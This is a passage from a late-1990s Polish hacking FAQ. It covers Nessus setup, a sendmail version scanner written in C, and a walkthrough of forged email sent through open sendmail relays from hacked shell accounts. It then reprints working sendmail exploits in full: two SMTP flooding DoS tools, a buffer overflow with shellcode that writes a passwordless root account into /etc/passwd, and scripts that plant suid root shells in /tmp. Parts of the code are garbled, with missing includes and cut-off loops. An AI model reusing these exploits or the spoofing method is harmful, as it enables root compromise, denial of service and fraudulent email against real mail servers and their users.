aktywne porty, zainstalowane X-y, zainstalowany skaner sieciowy nessus,
odgadl rodzaj systemu oraz jadra naprawde Ciekawe rzeczy.
16.Drogi skaner ktory chcialbym opisac nazywa sie nessus. To jest caly zbior
zkanerow. Charakteryzujes ie interfejsem graficznym oraz wykrywa aktualne luki
w systemach. Znajduje sie on takze w postaci rpm. Sa tam wersje dla Clienta,
roota ,zbior pluginsow itp. Po zainstalowaniu nalezy zalozyc konto nizej
pokaze jak
$ nessus-adduser

Addition of a new nessusd user
------------------------------

Login : root
Password : xxxxx tu wpisujesz haslo
Authentification type (cipher or plaintext) [cipher] : cipher
Now enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rule set)


Login : root
Pssword : xxxxx
Authentification : cipher
Rules :

Is that ok (y/n) ? [y] y

user added.

Po zalozeniu konta uruchamiamy program wpisujac w terminalu nessus. Urucjomi
sie nam interfejs graficzny. Wpisz nazwe hosta jaka masz w twoim kompie.
Podaj swoj Login (taki jak zakladales konto czyli root w naszym przypadku)
Podaj password i kliknij LOG in.
Po chwili pojawi Ci sie okno z dostepnymi Pluginsami sa to metody atakow i
wybierasz Cie interesujace
W zakladce Prefs znajduja sie ustawienia dotyczace skanowania. Sa tam techniki
skanowania i wogole nie bede tego opisywal bo wszystko tam pisze.
Scan options jak sama nazwa dotyczy opcji skanowania miedzyinnymi zakres
portow.
Target selection wpisujemy tam nazwe hosta lub adres IP serwera ktory chcemy
seskanowac
Wciskamy start the scan i rozpocznie sie skanowanie trwa ono roznie jak zem
skanowal wieksze servy z wiekszoscia opcji to trwalo to kololo 20-30 min
Po zakonczeniu wyswietli sie okno z raportem ze skanowania jakie porty sa
aktywne , oprogramoanie bledy w konfiguracji itp.

17. Ponizej zamieszczam kod zrodlowy skanerow sendmali ktory zamieszczam z
FAQ SLABIKA wystarczy go skompilowac i po uruchomieniu pisze jak z niego
korzystac


///tu wyciac///


#include
#include
#include
#include
#include
#include
#include

#define TIMEOUT 5

FILE *server;
int sock,to;

void timeout(int signo) { to=1; };

void sm(char *host) {
char inbuf[1024];
struct sockaddr_in sin;
struct hostent *hp;
int x;
hp=gethostbyname(host);
if (h_errno!=0) {
printf("Nie moge namierzyc %s, pomijam...\n",host);
return;
}
bcopy(hp->h_addr,(char *) &sin.sin_addr,hp->h_length);
sin.sin_family=hp->h_addrtype;
sin.sin_port=htons(25);
sock=socket(AF_INET,SOCK_STREAM,0);
if (-1 printf("Polaczenie z %s: ", host);
else {
printf("Nie moge polaczyc sie z %s, pomijam...\n",host);
return;
}
server=fdopen(sock,"a+");
while(1) {
signal(SIGALRM,timeout);
to=0;
alarm(TIMEOUT);
x=recv(sock,inbuf,1024,0);
alarm(0);
if (x==-1) {
printf("(polaczenie przerwane)\n");
break;
}
if (to) {
printf("(przekroczony czas oczekiwania)\n");
break;
}
if (strlen(inbuf)!=0) {
for (x=3;x if (inbuf[x]==';') inbuf[x]=0; else
if ((inbuf[x]==',')&&(inbuf[x-3]==' ')) inbuf[x-3]=0;
printf("%s\n",inbuf);
break;
}
}
close(sock);
}

void main(int argc,char *argv[]) {
FILE* f;
char srv[1024];
int ile=0,a;
printf("Sendmail-SCANNER \n");
if (argc!=2) {
printf(" Ten program sprawdza wersje sendmaila na serwerach podanych");
printf(" w pliku.\n Liste serwerow mozna utworzyc za pomoca programu");
printf(" HTML2SRV.\n");
printf(" Sposob uzycia: SMSCAN plik_z_lista_serwerow\n");
exit(1);
}
f=fopen(argv[1],"r");
if (f==NULL) {
printf("Nie ma takiego pliku.\n");
exit(1);
}
while (fgets(srv,1024,f)) {
for (a=0;a<=strlen(srv);a++)
if ((srv[a]=='\n')||(srv[a]=='\r')) srv[a]=0;
if (strlen(srv)!=0) {
sm(srv);
ile++;
}
}
fclose(f);
printf("\nKoniec pracy. Sprawdzilem %d serwerow.\n",ile);
}

//// tu wyciac ////
18. Sendmail jest to najpopularniejszy program do przesylanie poczty email.
Przewaznie jest on ustawiony na porcie 25 mozna to sprawdzic nm zeskanowac
serwer, lub polaczyc sie z nim przez telnet nazwa serwera 25. Do wysylania
poczty mozemy uzyc polecen ktory otrzymamy po polaczeniu sie z serwerem przez
port 25 i wpisaniu komendy help. Przy wysylaniu poczty nie musimy podawac
wlasnego adresu email a np. jakis wymyslony. Sendmail jest dosc powazna luka w
systemie i mozna to wykorzywstac do uzyskania roota np przez roznego rodzaju
explolity.
19. Wysylanie fakemaili. Fakemaile jest to wysylanie anonimowej poczty. Wbrew
pozorom jest to banalne i wie o tym wiekszosc ludzi ale co mi tam. Napoczotek
musialbys znalesc jakies serwery ktore udostepniaja usloge sendmail a proso
mowiac te przez ktore mozna sie polaczyc przez port 25. Ja jeszcze przed
wyslaniem lacze sie z jakims kontem co udostepnia nam usloge shell (jakies z
haczone konta) i dopiero z niego lacze sie na dany serwer (ja zawsze jestem
przezorny) Dobra po podlaczeniu sie juz na dany serer
telnet xxxxx.xxx 25
220 xxxxx.xxx ESMTP Sendmail 8.9.3/8.9.2; Sat, 1 May 1999 1:48:56 +200
> hello ty
250 xxxxx.xxx Hello ppp123.katowice.tpnet.pl [198.589.789.523], pleased to
meet you
> mail from: lamer@palant.pl #tu wpisujesz adres odbiorcy
250 lamer@palant.pl ... Sender ok
> rcpt to: hacker@gumis.pl #adres nadawcy
250 hacker@gumis.pl Recipient ok
> data
354 Enter mail, with "." an o line by itself
Tu wpisujemy tresc emaila i konczymy go "."
>quit
I to juz jest wyszystko potrzebne do wysylania fakemaili!!!
20. Dlugo zastanawialem sie czy napisac ten dzial ale w koncu sie
zdecydowalem poniewaz sam nie pisze explolitow do sendamili ale zamieszcze
tutaj dosc aktualne WRAZ Z AUTORAMI i jestem im za to wdzieczny.
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by

Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net

*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define MAXCONN 5
#define LINES 150000

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {

printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
}

hp=gethostbyname(argv[2]);

if (!hp) {
perror("gethostbyname");
exit(1);
}

fprintf(stderr,"Doing mess: ");

for (;loop FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

usleep(100000);

fprintf(d,"helo tweety\n");
fprintf(d,"mail from: tweety@polbox.com\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");

usleep(100000);

for(loop=0;loop if (!(loop%100)) fprintf(stderr,".");
fprintf(d,"To: x\n");
}

fprintf(d,"\n\n\nsomedata\n\n\n");

fprintf(d,".\n");

sleep(1);

fprintf(d,"quit\n");
fflush(d);

sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}

waitpid(x,&loop,0);

fprintf(stderr,"ok\n");

return 0;
}
_____________________________________________________________________________________________





/*
sendmail 8.8.4, freebsd, mime 7to8, remote
I checked this only at home, at custom installed 8.8.4.
I have no freebsd with preinstaled 8.8.4 around.
change cmd[] below to shell command you want, and throw output to sendmail
*/

#include
#include

#define BUFSIZE 6100
#define OFFS -5000
#define ALIGN 0
#define ADDRS 15

int get_sp(void) {
/* __asm__(" movl %esp,%eax"); */
return 0xefbf95e4;
}

/* up to 220 bytes */
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";

char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
"\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
"\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
"\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
"\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
"\x68\x2e\x2d\x63\x2e";

char nop[]="\x90";

char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

void run(unsigned char *buf) {
unsigned int i, j, k;

printf("MIME-Version: 1.0\n");
printf("Content-Type: text/plain\n");
printf("Content-Transfer-Encoding: base64\n");

k=strlen(buf) / 3 * 3;
for (i=0; i < k; i+=3) {
j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
if (i % 54 == 0)
printf("\n");
printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
printf("%c", Base64Table[(j & 0x03f000) >> 12]);
printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
printf("%c", Base64Table[j & 0x00003f]);
}
switch (strlen(buf) - k) {
case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[(buf[k] & 0x3) << 4]);
break;
case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
Base64Table[(buf[k+1] & 0xf) << 2]);
break;
default:
}
printf("\n");
}

char code[sizeof(asmcode) + sizeof(cmd)];

main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
int i, noplen=strlen(nop);

if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);

strcpy(code, asmcode);
strncat(code, cmd);
strncat(code, ".");
code[41]=0x1a+strlen(cmd)+1;

if (bufsize printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
exit(1);
}
if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
printf("Can't malloc\n");
exit(1);
}
*(int *)addr=get_sp()+offs;
printf("address - %p\n", *(int *)addr);
ptr=buf;
for (i=0; i *ptr++=nop[i % noplen];
memcpy(ptr-strlen(code), code, strlen(code));
for (i=0; i *ptr++=addr[i % sizeof(int)];
*ptr=0;
printf("total buf len - %d\n", strlen(buf));

run(buf);
}
_______________________________________________________________________________________


# Modified to create a suid root shell in /tmp
# this has been tested on Sendmamil 8.6.4 but
# is assumed to work on other versions.

# calculate the parameters needed for a given sendmail
# program to change config file from "/etc/sendmail.cf"
# to "/tmp/sendmail.cf"

# location of a readable sendmail program
SENDMAIL=/usr/lib/sendmail

TEMP=/tmp/.ab$$
mkdir $TEMP
cp $SENDMAIL $TEMP/sm
cd $TEMP
chmod 700 ./sm

cat > calc.c << _EOF_

#include

gencore()
{
int pid;
int fd[2];

if(pipe(fd) < 0) {
perror("pipe");
exit(1);
return(0);
}
pid = fork();
if(!pid) {
int f = open("./out", O_RDWR|O_CREAT, 0666);
dup2(f, 1); dup2(fd[0], 0);
close(f); close(fd[1]); close(fd[0]);
execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
perror("exec");
exit(0);
} else {
sleep(2);
kill(pid, 11);
}
close(fd[0]);
close(fd[1]);
}

main(argc,argv)
char **argv;
int argc;
{
unsigned int ConfFile,tTdvect,off;

gencore();
tTdvect = find("ZZZZZZZZ", "core");
ConfFile = find("/nau/local/lib/mail/aliases", "core");
if(!tTdvect || !ConfFile) {
printf("Not found!\n");
return(0);
}
off = ConfFile - tTdvect;
printf("sendmail -d%u.%d,%u.%d,%u.%d\n",
off+1, 't', off+2, 'm', off+3, 'p');
}

int find(pattern, file)
char *pattern,*file;
{
int fd;
int i, addr;
char c;

/* printf("find %s: ", pattern); */
fd = open(file, 0);

/* assume file exists
if(fd < 0) {
printf("file %s not found\n", file);
return(0);
}
*/
i = 0;
addr = 0;
while(read(fd, &c, 1) == 1) {
if(pattern[i] == c)
i++;
else
i=0;
if(pattern[i] == '\0') {
addr -= strlen(pattern);
printf("%x (%d)\n", addr, addr);
return(addr);
}
addr++;
}
printf("Not Found!\n");
return(0);
}
_EOF_

cc calc.c -o calc
./calc
cd
rm -rf $TEMP
________________________________________________________________

!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array. As it, it will work with the 8 versions of sun sendmail
# that I have access to. Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE: This is a Sun specific script. Don't expect it to work with
# any non-sun sendmail.
# -MRW (atreus)
#
# usage: smdhole [/path/to/suid/sendmail]
#

if [ $1x = x ]; then
sendmail=/usr/lib/sendmail
else
echo "Trying to abuse $1."
sendmail=$1
fi

sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`

# prefix and suffix for -1 as unsigned integer. Actually, this is
# off by two. you figure out why.
prefix=42949
suffix=67297

case $sm_size in
132064)
n1=${prefix}52864
n2=${prefix}52865
n3=${prefix}52866
echo Patched solaris w/o mx.
;;
134752)
n1=${prefix}1656
n2=${prefix}1657
n3=${prefix}1658
echo Patched solaris sendmail.mx
;;
130860)
n1=${prefix}53016
n2=${prefix}53017
n3=${prefix}53018
echo Un-patched solaris w/o mx.
;;
133548)
n1=${prefix}1808
n2=${prefix}1809
n3=${prefix}1810
echo Un-patched solaris sendmail.mx
;;
139264)
n1=${prefix}49609
n2=${prefix}49610
n3=${prefix}49611
echo Sun 4.1.3 sendmail - could be either of two versions
n4=${prefix}49265
n5=${prefix}49266
n6=${prefix}49267
;;
155648)
n1=${prefix}46953
n2=${prefix}46954
n3=${prefix}46955
echo Sun 4.1.3 sendmail.mx - could be either of two versions
n4=${prefix}46609
n5=${prefix}46610
n6=${prefix}46611
;;
*)
echo "I don't know what version of sendmail $sendmail is."
echo -n "Look for other versions of sendmail[.mx] on the "
echo "system and re-run this as:"
echo " $0 /path/to/another/suid/sendmail"
exit 1
;;
esac

cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp

H?F?From: nobody

Mlocal, P=/tmp/fixit, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog, P=/tmp/fixit, F=lsDFMeuP, S=10, R=20, A=sh -c \$u

S0
R\$+ \$#local \$:\$1 just rewrite
EOM

cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/fixit.Z
chmod 755 /tmp/fixit

mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail

cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <
test
EOF

if [ -x /tmp/newsh ]; then
echo "Had the right offset for sendmail.cf. Here's the result:"
else
echo "Looks like I had the wrong sendmail.cf offset. Fuckers."
if [ ${n4}x = x ]; then
echo "This version isn't what I thought it was."
echo "Look for other suid sendmails and try this on them."
else
echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <
test
EOF
echo "Here's the result:"
fi
fi

rm /tmp/fixit
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh

exit

______________________________________________________________

/*
By Michal Szymanski

Sendmail DoS (up to 8.9.3);

Sat Apr 3 00:12:31 CEST 1999
*/

#include
#include
#include
#include
#include
#include
#include

#undef VERBOSE /* define it, if MORECONN is undefined */

#define MORECONN

// #define RCPT_TO "foo@ftp.onet.pl"

#define RCPT_TO "foo@10.255.255.255"

#ifdef MORECONN
#define MAXCONN 5
#endif

#define BSIZE 1048576 /* df* control file size */
#define PORT 25

char buffer[BSIZE];
int sockfd,x,loop,chpid;

void usage(char *fname) {
fprintf(stderr,"Usage: %s \n",fname);
exit(1);
}

void say(char *what) {

if (write(sockfd,what,strlen(what))<0) {
perror("write()");
exit(errno);
}

#ifdef VERBOSE
fprintf(stderr,"<%s",what);
#endif

bzero(buffer,BSIZE);

usleep(1000);

if (read(sockfd,buffer,BSIZE)<0) {
perror("read()");
exit(errno);
}

#ifdef VERBOSE
fprintf(stderr,buffer);
#endif
}


int main(int argc,char *argv[]) {
struct sockaddr_in serv_addr;
struct hostent *host;
char *hostname,hostaddr[20];

fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");

if (argc<2) usage(argv[0]);

#ifdef VERBOSE
fprintf(stderr,">Preparing address. \n");
#endif

hostname=argv[1];

serv_addr.sin_port=htons(PORT);
serv_addr.sin_family=AF_INET;

if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {

#ifdef VERBOSE
fprintf(stderr,">Getting info from DNS.\n");
#endif

if ((host=gethostbyname(hostname))==NULL) {
herror("gethostbyname()");
exit(h_errno);
}

serv_addr.sin_family=host->h_addrtype;

bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);

#ifdef VERBOSE
fprintf(stderr,">Official name of host: %s\n",host->h_name);
#endif

hostname=host->h_name;

sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
(unsigned char)host->h_addr[1],
(unsigned char)host->h_addr[2],
(unsigned char)host->h_addr[3]);

}
else sprintf(hostaddr,"%s",hostname);

#ifdef MORECONN
for (;loop#endif

for(;;) {

bzero(&(serv_addr.sin_zero),8);

if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
perror("socket()");
exit(errno);
}

if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) {
perror("connect()");
exit(errno);
}

#ifdef VERBOSE
fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
#endif

bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE);
#ifdef VERBOSE
fprintf(stderr,buffer);
#else
fprintf(stderr,".");
#endif

say("helo foo\n");
say("mail from:root@localhost\n");
say("rcpt to:" RCPT_TO "\n");
say("data\n");

for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE);

say("\n.\n");
sleep(1);
say("quit\n");

shutdown(sockfd,2);

close(sockfd);

#ifdef VERBOSE
fprintf(stderr,">Connection closed succesfully.\n");
#endif
}
#ifdef MORECONN
}
waitpid(chpid,NULL,0);
#endif
return 0;
}
_______________________________________________________________________
To by bylo na tyle z dzialo EXPLOLIT Sendmail. W razie jakichkolwiek
problemow prosze kontakowac sie ze mna lub z AUTORAMI EXPLOLITOW


21. POzdrowienia
POzdrowienia dla: Vereba,Tomka,Moniki,Darka Wszystkich ludzi korzy maja
zwiazek z powstaniem tego faq miedzy innymi autorow explolitow dzialo
sendmail. Ludzi ktorzy maja zwiazek z powstaniem internetu. Wszystkich
hackerow na calym swiecie. Oraz anty pozdrowienia dla mojego nauczyciela z
konstrucji oraz matematyki gdybyscie nie wy to bym wiedzial o hacku o duzo
wiecej a tak to nie mam czasu.
22. Zakonczenie
Mozecie mnie znalesc na kanalach: #hackpl, #phreakpl, #hackerspl,
Wszystkie uwagi te negatywne oraz pozytywne prosze przesylac na adres
Markus@poczta.fm oraz ludzi ktorzy chcieli by nawiazac wspolprace ze mna i
moze zalozenia jakiejs grupy. Dzieki NARA

MARQS@mind/




Wyszukiwarka

Podobne podstrony:
informatyka linux w biurze i nie tylko
Linux w biurze i nie tylko
FrontPage 2003 PL Nie tylko dla webmasterow
(NIE) Tylko taniec danceflick 2009 Komedia, Akcja, Muzyczny
nie tylko grodecka, czuwaj 1 2009
Zarabianie przez internet , praca przy komputerze , zarabiaj nie tylko za granicą
WSZYSTKO CO BIOTECHNOLOG MUSI MIEĆ W LABORATORIUM I NIE TYLKO
wlasne zdanie nie tylko w pracy
Cz 5 Fundusze i nie tylko
Materiały termoizolacyjne nie tylko ocieplają 10 04

więcej podobnych podstron